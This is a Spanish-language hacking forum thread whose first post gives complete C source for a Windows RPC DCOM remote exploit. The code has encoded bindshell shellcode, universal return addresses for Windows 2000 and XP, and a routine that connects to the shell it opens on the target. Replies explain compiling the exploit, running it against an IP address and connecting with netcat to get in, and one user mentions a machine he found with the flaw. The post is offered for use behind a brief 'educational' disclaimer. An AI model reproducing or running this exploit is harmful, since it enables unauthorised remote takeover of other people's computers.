Resultados 1 al 12 de 12

Windows remote RPC DCOM exploit with Universal targets

  1. #1 Windows remote RPC DCOM exploit with Universal targets 
    Emeritus HH-team Avatar de TseTse
    Fecha de ingreso
    Apr 2002
    Ubicación
    Metaverso
    Mensajes
    3.284
    Descargas
    1
    Uploads
    0
    Creo que alguien buscaba este exploit......

    Código:
    /* Windows remote RPC DCOM exploit
     * Coded by oc192 
     * 
     * Includes 2 universal targets, 1 for win2k, and 1 for winXP. This exploit uses
     * ExitThread in its shellcode to prevent the RPC service from crashing upon 
     * successful exploitation. It also has several other options including definable 
     * bindshell and attack ports.
     * 
     * Features:
     *
     * -d destination host to attack.
     *
     * -p for port selection as exploit works on ports other than 135(139,445,539 etc)
     *
     * -r for using a custom return address.
     *
     * -t to select target type (Offset) , this includes universal offsets for - 
     *    win2k and winXP (Regardless of service pack)
     *
     * -l to select bindshell port on remote machine (Default: 666)
     *
     * - Shellcode has been modified to call ExitThread, rather than ExitProcess, thus 
     *   preventing crash of RPC service on remote machine.
     * 
     *   This is provided as proof-of-concept code only for educational 
     *   purposes and testing by authorized individuals with permission to 
     *   do so.
     */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <netdb.h>
    #include <fcntl.h>
    #include <unistd.h>
    
    /* xfocus start */
    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
    
    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00};
    
    unsigned char request2[]={
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x5C,0x00,0x5C,0x00};
    
    unsigned char request3[]={
    0x5C,0x00
    ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
    /* end xfocus */
    
    int type=0;
    struct
    {
      char *os;
      u_long ret;
    }
     targets[] =
     {
      { "[Win2k-Universal]", 0x0018759F },
      { "[WinXP-Universal]", 0x0100139d },
    }, v;
     
    
    void usage(char *prog)
    {
      int i;
      printf("RPC DCOM exploit coded by .:[oc192.us]:. Security\n");
      printf("Usage:\n\n");
      printf("%s -d <host> [options]\n", prog);
      printf("Options:\n");
      printf("	-d:		Hostname to attack [Required]\n");
      printf("	-t:		Type [Default: 0]\n");
      printf("	-r:		Return address [Default: Selected from target]\n");
      printf("	-p:		Attack port [Default: 135]\n");
      printf("	-l:		Bindshell port [Default: 666]\n\n");
      printf("Types:\n");
      for(i = 0; i < sizeof(targets)/sizeof(v); i++)
        printf("	%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
      exit(0);
    }
    
    unsigned char sc[]=
        "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
        "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
        "\x46\x00\x58\x00\x46\x00\x58\x00"
    
        "\xff\xff\xff\xff" /* return address */
        
        "\xcc\xe0\xfd\x7f" /* primary thread data block */
        "\xcc\xe0\xfd\x7f" /* primary thread data block */
    
        /* bindshell no RPC crash, defineable spawn port */
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
        "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
        "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
        "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
        "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
        "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
        "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
        "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
        "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
        "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
        "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
        "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
        "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
        "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
        "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
        "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
        "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
        "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
        "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
        "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
        "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
        "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
        "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
        "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
        "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
        "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
        "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
        "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
        "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
        "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
        "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
        "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
     
    /* xfocus start */
    unsigned char request4[]={
    0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
    ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
    ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };
    /* end xfocus */
    
    /* Not ripped from teso =) */
    void con(int sockfd)
    {
      char rb[1500];
      fd_set  fdreadme;
      int i;
    
      FD_ZERO(&fdreadme);
      FD_SET(sockfd, &fdreadme);
      FD_SET(0, &fdreadme);
    
      while(1) 
      {
        FD_SET(sockfd, &fdreadme);
        FD_SET(0, &fdreadme);
          if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
            if(FD_ISSET(sockfd, &fdreadme)) 
            {
              if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
              {
                printf("[-] Connection lost..\n");
                exit(1);
              }
                if(write(1, rb, i) < 0) break;
            }
    
            if(FD_ISSET(0, &fdreadme)) 
            {
              if((i = read(0, rb, sizeof(rb))) < 0)
              {
                printf("[-] Connection lost..\n");
                exit(1);
              }
               if (send(sockfd, rb, i, 0) < 0) break;
            }
               usleep(10000);
            }
            
            printf("[-] Connection closed by foreign host..\n");
     
            exit(0);
    }
    
    int main(int argc, char **argv)
    {
        int len, len1, sockfd, c, a;
        unsigned long ret;
        unsigned short port = 135;
        unsigned char buf1[0x1000];
        unsigned char buf2[0x1000];
        unsigned short lportl=666; /* drg */
        char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
        struct hostent *he;
        struct sockaddr_in their_addr;
        static char *hostname=NULL;
    
        if(argc<2)
        { 
          usage(argv[0]);
        }
    
        while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
        {
          switch (c)
          {
            case 'd':
              hostname = optarg;
              break;
            case 't':
              type = atoi(optarg);
              if((type > 1) || (type < 0))
              {
                printf("[-] Select a valid target:\n");
                  for(a = 0; a < sizeof(targets)/sizeof(v); a++)
                  printf("    %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os);              
                  return 1;
              }
              break;
            case 'r':
              targets[type].ret = strtoul(optarg, NULL, 16);
              break;
            case 'p':
              port = atoi(optarg);
              if((port > 65535) || (port < 1))
              {
                printf("[-] Select a port between 1-65535\n");
                return 1;
              }
              break;
            case 'l':
              lportl = atoi(optarg);   
              if((port > 65535) || (port < 1))
              {
                printf("[-] Select a port between 1-65535\n");
                return 1;
              }
              break;
           default:
              usage(argv[0]);
              return 1;
          }
        }
    
        if(hostname==NULL)
        {
          printf("[-] Please enter a hostname with -d\n");
          exit(1);
        }
    
        printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n");
        printf("[+] Resolving host..\n");
    
        if((he = gethostbyname(hostname)) == NULL)
        {
          printf("[-] gethostbyname: Couldnt resolve hostname\n");
          exit(1);
        }
    
        printf("[+] Done.\n");
    
        printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8x]\n", 
                  targets[type].os, hostname, port, lportl, targets[type].ret);
    
        /* drg */   
        lportl=htons(lportl);
        memcpy(&lport[1], &lportl, 2);
        *(long*)lport = *(long*)lport ^ 0x9432BF80;
        memcpy(&sc[471],&lport,4);
    
        memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);
    
        their_addr.sin_family = AF_INET;
        their_addr.sin_addr = *((struct in_addr *)he->h_addr);
        their_addr.sin_port = htons(port);
    
        if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
            perror("[-] Socket failed");
            return(0);
        }
        
        if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
        {
            perror("[-] Connect failed");
            return(0);
        }
        
        /* xfocus start */
        len=sizeof(sc);
        memcpy(buf2,request1,sizeof(request1));
        len1=sizeof(request1);
        
        *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
        *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
        
        memcpy(buf2+len1,request2,sizeof(request2));
        len1=len1+sizeof(request2);
        memcpy(buf2+len1,sc,sizeof(sc));
        len1=len1+sizeof(sc);
        memcpy(buf2+len1,request3,sizeof(request3));
        len1=len1+sizeof(request3);
        memcpy(buf2+len1,request4,sizeof(request4));
        len1=len1+sizeof(request4);
        
        *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
        
    
        *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;  
        *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
        *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
        *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
        *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
        *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
        *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
        /* end xfocus */
        
    
        if (send(sockfd,bindstr,sizeof(bindstr),0)== -1)
        {
                perror("[-] Send failed");
                return(0);
        }
        len=recv(sockfd, buf1, 1000, 0);
        
        if (send(sockfd,buf2,len1,0)== -1)
        {
                perror("[-] Send failed");
                return(0);
        }
        close(sockfd);
        sleep(1);
        
        their_addr.sin_family = AF_INET;
        their_addr.sin_addr = *((struct in_addr *)he->h_addr);
        their_addr.sin_port = lportl;
    
        if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
            perror("[-] Socket failed");
            return(0);
        }
        
        if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
        {
            printf("[-] Couldnt connect to bindshell, possible reasons:\n");
            printf("	1:	Host is firewalled\n");
            printf("	2:	Exploit failed\n");
            return(0);
        }   
        
        printf("[+] Connected to bindshell..\n\n");
    
        sleep(2);
    
        printf("-- bling bling --\n\n");
    
        con(sockfd);
    
        return(0);
    }
    TseTse
    ͎T͎͎s͎͎e͎͎T͎͎s͎͎e͎
    Citar  
     

  2. #2  
    Moderador HH
    Fecha de ingreso
    Mar 2003
    Ubicación
    Galiza
    Mensajes
    3.919
    Descargas
    8
    Uploads
    1
    gracias, yo era uno de los que lo buscaba.
    Un Saludo
    Citar  
     

  3. #3  
    Ex-moderador
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    1.230
    Descargas
    0
    Uploads
    0
    es el fallo más garrafal, general y fácil de explotar que he visto en mi vida.
    Citar  
     

  4. #4  
    Moderador HH
    Fecha de ingreso
    Sep 2002
    Ubicación
    127.0.0.1
    Mensajes
    1.817
    Descargas
    3
    Uploads
    0
    gracias

    -salu2-
    Quien no sabe lo que busca no entiende lo que encuentra.
    Citar  
     

  5. #5 cho 
    Iniciado
    Fecha de ingreso
    May 2003
    Mensajes
    4
    Descargas
    0
    Uploads
    0
    bueno talvez ustedes sepan peroyo no?? esperoqueno me insulten

    como se explota???
    Citar  
     

  6. #6  
    Ex-moderador
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    1.230
    Descargas
    0
    Uploads
    0
    pues lo compilas y lo ejecutas en tu máquina desde msdos. En cyruxnet.com.ar lo encontrarás compilado.
    EN la versión compilada que he probado tienes que poner:
    "SO IP" (ej: 0 xxx.xxx.xxx.xxx) o ( 1 xxx.xxx.xxx.xxx) y se ejecuta el exploit remótamente, a partir de ahí coges el netcat y haces "nc xxx.xxx.xxx.xxx 4444). Y ya estás dentro!

    Esta explicación está basada en el explot que utilizo yo (hay varios), pero creo que el funcionamiento será parecido en todos.
    Recurrimos a la televisión para apagar el cerebro, y a la computadora para encenderlo. (Steve Jobs)

    .:: Pringao Howto ::. el blog de un pringao
    Citar  
     

  7. #7  
    Iniciado
    Fecha de ingreso
    Nov 2003
    Mensajes
    30
    Descargas
    0
    Uploads
    0
    TseTse

    me podrias explicar que es eso d la vunerabilidad RPC porque me encontre con una maquina que lo tiene
    Citar  
     

  8. #8  
    Avanzado
    Fecha de ingreso
    Nov 2002
    Ubicación
    Ciudad de México
    Mensajes
    296
    Descargas
    0
    Uploads
    0
    El que yo uso ya te ejecuta la shell, es muy comodo
    Citar  
     

  9. #9  
    Emeritus HH-team Avatar de TseTse
    Fecha de ingreso
    Apr 2002
    Ubicación
    Metaverso
    Mensajes
    3.284
    Descargas
    1
    Uploads
    0
    Escrito originalmente por pelon666
    TseTse

    me podrias explicar que es eso d la vunerabilidad RPC porque me encontre con una maquina que lo tiene
    http://www.google.es/search?hl=es&ie=UTF-8&oe=UTF-8&q=vulnerabilidad+rpc&spell=1

    En tus palabras se encuentra la respuesta.....

    TseTse
    ͎T͎͎s͎͎e͎͎T͎͎s͎͎e͎
    Citar  
     

  10. #10 Como se compila 
    Iniciado
    Fecha de ingreso
    Mar 2002
    Mensajes
    10
    Descargas
    0
    Uploads
    0
    Todo lo que decis es muy interesante y muy instrutivo, pero aunu me queda una duda.¿ Como se compila?¿Java?o como.
    Gracias de antemano
    Citar  
     

  11. #11  
    Moderador HH
    Fecha de ingreso
    Mar 2003
    Ubicación
    Galiza
    Mensajes
    3.919
    Descargas
    8
    Uploads
    1
    Con un compilador ANSI C, como el GCC (linux), el Dev-C++ (Windows), lo que tienes que tener el la libreria de sockets.
    Un Saludo
    Citar  
     

  12. #12  
    Avanzado
    Fecha de ingreso
    Sep 2002
    Ubicación
    En mi chavola
    Mensajes
    194
    Descargas
    4
    Uploads
    0
    Eso me ha pasado a mi más de una vez, que no sabes en que lenguaje está el exploit, pero bueno, poco a poco te acostumbras, la mayoría suelen estar en C si no me equivoco.

    Hasta que lugar llegaba mi burreria que pensaba que un exploit tenia que estar dentro de la maquina remota, en fin... sin comentarios...

    Cuanto queda por aprender :P.

    Saludos a todos, y feliz año nuevo (un poco atrasado...)
    ---==Є£~CHΔCΔL==---

    ««--La curiosidad mató al gato, a mi me mostro las puertas--»»
    http://www.hacktheuniverse.tk
    Citar  
     

Temas similares

  1. Remote Exploit
    Por 4-all en el foro LINUX - MAC - OTROS
    Respuestas: 0
    Último mensaje: 03-06-2005, 21:41
  2. Need for Speed 2 Remote Client Buffer Overflow Exploit
    Por TseTse en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 24-01-2004, 11:16
  3. Respuestas: 0
    Último mensaje: 07-01-2004, 06:29
  4. phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
    Por TseTse en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 07-01-2004, 06:28
  5. PHP-NUKE version <= 6.9 'cid' sql injection Remote Exploit
    Por TseTse en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 07-01-2004, 06:27

Marcadores

Marcadores